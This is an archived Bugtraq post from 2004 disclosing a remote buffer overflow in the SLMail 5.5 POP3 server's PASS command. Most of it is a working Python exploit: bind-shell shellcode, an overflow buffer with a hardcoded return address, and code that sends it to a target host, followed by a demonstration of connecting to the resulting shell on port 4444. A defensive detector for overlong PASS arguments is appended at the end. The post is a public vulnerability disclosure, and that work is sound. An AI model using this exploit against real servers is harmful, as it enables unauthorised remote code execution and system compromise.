SLMail 5.x POP3 Remote Pass Buffer Overflow Exploit

From: Jérôme ATHIAS (jerome.athias_at_free.fr)
Date: 11/18/04

    To: <bugtraq@securityfocus.com>
    Date: Thu, 18 Nov 2004 22:19:49 +0100


    SLMail 5.x POP3 Remote Pass Buffer Overflow Exploit

    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942

    INTRO:

    SLMail Pro is web-based POP3 and SMTP email server software for Microsoft
    Windows 2000 that includes advanced features usually found in
    enterprise-level systems.
    Seattlelab has been providing businesses with an alternative to expensive
    email server software for 10 years. Because of its stability, features, and
    price, SLMail Pro has created a niche in a competitive market, proving there
    is no need to spend a small fortune to implement a secure, full-featured
    email server solution.

    PoC:

    ######################################
    # #
    # SLmail 5.5 POP3 PASS Buffer Overflow #
    # Discovered by : Muts #
    # Coded by : Muts #
    # WWW.WHITEHAT.CO.IL #
    # Plain vanilla stack overflow in the PASS command #
    # #
    ######################################
    # D:\Projects\BO>SLmail-5.5-POP3-PASS.py #
    ######################################
    # D:\Projects\BO>nc -v 192.168.1.167 4444 #
    # localhost.lan [192.168.1.167] 4444 (?) open #
    # Microsoft Windows 2000 [Version 5.00.2195] #
    # (C) Copyright 1985-2000 Microsoft Corp. #
    # C:\Program Files\SLmail\System> #
    ######################################

    import struct
    import socket

    print "\n\n############################"
    print "\nSLmail 5.5 POP3 PASS Buffer Overflow"
    print "\nFound & coded by muts [at] whitehat.co.il"
    print "\nFor Educational Purposes Only!"
    print "\n\n############################"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
    sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
    sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
    sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
    sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
    sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
    sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
    sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
    sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
    sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
    sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
    sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
    sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
    sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
    sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
    sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
    sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
    sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
    sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
    sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
    sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
    sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
    sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
    sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
    sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"

    #Tested on Win2k SP4 Unpatched
    # Change ret address if needed
    buffer = '\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\x90'*32 + sc
    try:
            print "\nSending evil buffer..."
            s.connect(('192.168.1.167',110))
            data = s.recv(1024)
            s.send('USER username' +'\r\n')
            data = s.recv(1024)
            s.send('PASS ' + buffer + '\r\n')
            data = s.recv(1024)
            s.close()
            print "\nDone! Try connecting to port 4444 on victim machine."
    except:
            print "Could not connect to POP3!"

    Regards to muts and WH
    Support the Whoppix project: http://whoppix.net/
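A defender-side check for the traffic pattern the PoC above produces, added here as an example and not code from the original post: it parses POP3 client commands and flags a PASS argument far longer than any legitimate password, recording the single-byte filler run and the NOP sled the buffer carries. The 256-byte threshold, the sample sessions and the placeholder return address are constructed for this example; the 4654-byte filler and 32-byte sled are the sizes the PoC uses.

```python
# Added example (not from the original post): a defender-side check that
# parses POP3 client traffic and flags PASS arguments shaped like the PoC's
# buffer (long single-byte filler, return address, NOP sled, payload).
# Sizes come from the PoC (4654 filler bytes, 32-byte NOP sled); the
# sessions below are constructed here, with a placeholder return address
# and int3 bytes standing in for shellcode.

PASS_LIMIT = 256   # assumed upper bound for any legitimate password length
FILLER_LEN = 4654  # filler length used by the PoC buffer

def parse_pop3_commands(stream: bytes):
    """Split a raw client stream into (VERB, argument) pairs.
    POP3 commands are CRLF-terminated and the verb is case-insensitive."""
    commands = []
    for line in stream.split(b"\r\n"):
        if line:
            verb, _, arg = line.partition(b" ")
            commands.append((verb.upper().decode("ascii", "replace"), arg))
    return commands

def longest_repeat_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte (filler/sled indicator)."""
    best = run = 1 if data else 0
    for prev, cur in zip(data, data[1:]):
        run = run + 1 if cur == prev else 1
        best = max(best, run)
    return best

def find_pass_overflow(stream: bytes, limit: int = PASS_LIMIT):
    """Return one finding per PASS argument longer than `limit`, recording
    its length, the longest filler run and whether a NOP sled is present.
    A payload containing CR LF would be cut by the line framing, so the
    length check is a heuristic on the client's command line, not a parser
    of the exploit itself."""
    findings = []
    for verb, arg in parse_pop3_commands(stream):
        if verb == "PASS" and len(arg) > limit:
            findings.append({
                "length": len(arg),
                "filler_run": longest_repeat_run(arg),
                "nop_sled": b"\x90" * 16 in arg,
            })
    return findings

# Constructed sample sessions (not captured traffic).
BENIGN_SESSION = b"USER alice\r\nPASS s3cret!\r\nSTAT\r\nQUIT\r\n"
ATTACK_SESSION = (b"USER username\r\nPASS " + b"A" * FILLER_LEN
                  + b"RET!" + b"\x90" * 32 + b"\xcc" * 8 + b"\r\n")

if __name__ == "__main__":
    print(find_pass_overflow(BENIGN_SESSION))   # []
    print(find_pass_overflow(ATTACK_SESSION))   # one finding, length 4698
```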

